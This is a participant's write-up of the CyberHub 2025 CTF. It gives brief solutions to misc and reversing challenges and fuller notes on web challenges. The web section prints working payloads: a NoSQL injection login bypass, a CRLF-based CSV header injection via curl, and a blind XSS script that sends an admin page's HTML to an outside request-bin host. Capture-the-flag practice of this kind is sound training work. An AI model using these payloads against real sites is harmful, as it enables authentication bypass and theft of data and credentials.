Cyber Hub 2025 CTF

Introduction

  • CyberHub 2025 CTF was a short, 6-hour CTF at King Saud University in Riyadh. The event was co-hosted by CyberHub, Cyberani, CyberShe, and Flagyard, drawing in around 25 teams of two to five members each. Whether you were a cryptography buff or a web exploitation rookie, there was something for everyone.

  • Date: 01/05/2025

  • Duration: 6 hours

  • Categories:

    • Crypto (4 challenges)

    • Forensics (4 challenges)

    • Misc (3 challenges)

    • PWN (3 challenges)

    • Reversing (3 challenges)

    • Web (4 challenges)

  • Prizes:

    • First Place: 7000 SAR

    • Second Place: 5000 SAR

    • Third Place: 3000 SAR

    • Fourth & Fifth Place: INE vouchers each

    • Giveaway: One additional INE voucher

Miscellaneous Challenges: A Walk in the Park

Desert Mirage

  • Make the provided file executable and run it.

  • Output: RmxhZ1l7bWlyYWdlX3JlZmxlY3Rpb259

  • Decode from Base85 to reveal the flag.

  • Flag: FlagY{mirage_reflection}

Shallow Sea

  • Inspect a PNG file for hidden data. I used zsteg through an online tool (aperisolve)

  • Flag: FlagY{hidden_currents}

Prismatic Veil

  • Analyze a PCAP for scattered packet data. Reassemble DNS packets to uncover the flag.

  • Flag: FlagY{prismatic_dns_reveal}

Reverse Engineering

  • I did only one that was really simple and easy.

Obsidian Crucible

  • Make the binary executable and run it.

  • Output & Flag: The program simply printed FlagY{shadow_vm_master} when executed.

Web

!QL

  • I tried different basic SQL injection payloads, default creds, etc. but, the login page stubbornly returned:

{"success":false}
  • After poking around, I checked robots.txt and saw hints (rabbit hole):

# it's not that easy but u r half way there.
# Contact: g0at@CSC.com
  • Turns out, it was a classic NoSQL injection. Sending this payload succeeded:

{
  "email": {"$ne": "invalid"},
  "password": {"$ne": "invalid"}
}
  • Flag: FlagY{b2293e35958626ae7ac15fe349d77770}

d3limit3r

  • This challenge let you dynamically generate a CSV with custom columns and delimiters, then applied a filter to hide the flag row. By injecting a dummy header with a line break, I altered the CSV structure so that the filter logic missed the flag row:

curl -X POST http://<target>/generate \
  -d "numColumns=2&columnName0=injected%0d%0aid,col1&columnName1=col2&delimiter=," \
  --output random.csv
  • The trick produced a row like NaN,FLAG,FLAG, slipping past the filter and revealing the flag in plain sight.

  • Flag: FlagY{e32fff4435eac6e12527297875c96456}

BL1ndly

  • This one was a bit harder. It was a system with 2 functions, one being a login form and the other being a a form to submit feedback that supposedly being sent to admin.

  • The feedback form didn't have any type of form validation, I tried XSS injection. First, I had to set up a request bin (via Pipedream) and crafted a blind XSS payload in the feedback form, I tried multiple times to get the flag.txt but then I couldn't so I just used this payload to get the full page:

<script>
  fetch(document.location.href)
    .then(res => res.text())
    .then(html =>
      fetch("https://<my-bin>.pipedream.net?html=" + encodeURIComponent(html))
    )
</script>
  • That exposed the admin credentials:

username: SecretAdmin
password: sup3r_secure!
  • I logged in thinking that I will get the flag but it's not that easy. After login there is an Excel upload function. I tried with a random file to test and I got:

❌ <sheet> tag not found or empty
  • It hinted towards an XXE attack. I tried multiple different payloads by editing workbook.xml inside the XLSX ZIP. Unfortunately, I couldn’t get past the errors in time.

Last updated